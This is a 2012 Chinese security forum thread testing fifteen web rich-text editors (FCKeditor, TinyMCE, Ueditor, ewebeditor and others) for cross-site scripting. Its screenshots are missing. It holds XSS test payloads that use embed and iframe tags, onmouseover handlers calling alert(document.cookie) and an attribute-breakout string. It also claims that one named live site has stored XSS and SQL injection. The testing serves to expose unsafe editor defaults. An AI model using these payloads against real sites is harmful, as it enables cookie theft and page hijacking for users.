天马行空工作室

 找回密码
 加入天马
搜索
查看: 2796|回复: 4

对十五个编辑器xss的测试:

[复制链接]
发表于 2012-5-14 09:18:44 | 显示全部楼层 |阅读模式
测试代码:
  1. <embed src="http://tmxk.org" />
  2. <a href="http://tmxk.org">http://tmxk.org</a>
  3. <span onmouseover="javascript:alert(document.cookie)">alert(document.cookie)</span>
  4. <img href="javascript:alert()" />
  5. <iframe src="http://tmxk.org"></iframe>
  6. <form>
  7.         <input type="text" />
  8. </form>
  9. <>
复制代码
测试环境:基于官方的demo、遨游浏览器

1. FCKeditor


2. NicEdit

3. TinyMCE

4. jwysiwyg

5. Yahoo! UI Library: Rich Text Editor



6. Xinha


8. Free Rich Text Editor


10. TTW HTML Editor


11. Free Text Box


12. WYMeditor

13. BlueShoes Wysiwyg Editor

14. markItUp


15. SPAW Editor




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?加入天马

x
 楼主| 发表于 2012-5-14 09:32:58 | 显示全部楼层
说明:这些截图意味着什么?
这些截图意味着这类编辑器在没有改动的情况下,只能用作个人博客、消息咨询之类的网站。
不能用作论坛、微博、留言板等地方。

支持embed或者iframe,支持脚本事件,意味着父页面不再安全,iframe构造的链接完全可以摧毁父页面,插入iframe就形成了挂马,如果是人气比较旺的网站,就能形成蠕虫,这样获得的cookie是非常多的。对用户个人信息安全和用户体验造成了极大地损害。
 楼主| 发表于 2012-5-14 09:47:32 | 显示全部楼层
国内的:
1. Ueditor

在成功案例里看到:
dev26用了,注册,测试如下博客:

测试论坛:

同时此站存在注入:


存在持久型xss:
测试代码:
  1. “ onmouseover=javascript:alert(document.cookie)><embed src=http://tmxk.org>
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?加入天马

x
 楼主| 发表于 2012-5-14 10:55:53 | 显示全部楼层
ewebeditor:


xheditor

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?加入天马

x
发表于 2012-5-14 14:30:39 | 显示全部楼层
楼主强人,膜拜学习。。
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2019-11-21 19:04 , Processed in 1.280849 second(s), 22 queries .

Powered by Discuz! v8

© 2010-2014 对十五个编辑器xss的测试: - 安全交流 天马行空工作室

快速回复 返回顶部 返回列表